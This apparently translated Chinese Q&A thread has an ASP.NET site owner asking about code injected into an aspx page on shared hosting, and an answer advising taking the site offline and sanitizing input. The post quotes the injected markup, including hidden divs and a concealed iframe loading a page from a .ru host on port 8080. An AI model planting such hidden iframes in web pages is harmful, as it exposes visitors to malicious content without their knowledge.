我受到了攻击 - 我该怎么办?

Bre*_*ers 3 .net

有人把这个代码放到我的aspx页面上.

他们在做什么?

他们是怎么做到的?

我怎么阻止他们?

它位于共享托管服务器上.

它位于一个aspx内容页面上,该页面有一个母版页,位于</asp:content>标签之后......

<div style="display:none">qzfmjsdbknmrmlkszrrcehikeapphqq</div>

<div style="display:none">owhkhminltvnwvegxktzemrszyykcsh</div>

<div style="display:none">cljwdrmbxglllikbjctmpyvcflzxbqk</div>

<div style="display:none">vhhnvchdoxaklqjxlwaqvtgarazwcsx</div>

<div style="display:none">alsbcgosnllreyylgtmblvqwxgpidui</div>

<div style="display:none">yrrzaimkpvimddgirjpuatjzoyovdyq<iframe width=812 height=451 src="http://bionaft.ru:8080/index.php" ></iframe></div>
Run Code Online (Sandbox Code Playgroud)

squ*_*eks 39

让您的网站离线.

不,我是认真的.

将其脱机并查看处理用户输入的所有要点,查看代码并清理每个用户输入和每个输出.有很多关于XSS,代码注入等的文档.

  • 我当然很认真.你让它保持原样运行,搜索引擎会用恶意数据抓取它并让你被列入黑名单以托管恶意内容,这是一个需要很长时间才能恢复的横幅.获取您的网络服务器日志和代码,使该网站脱机,清理他们注入的代码并清理您的输入. (10认同)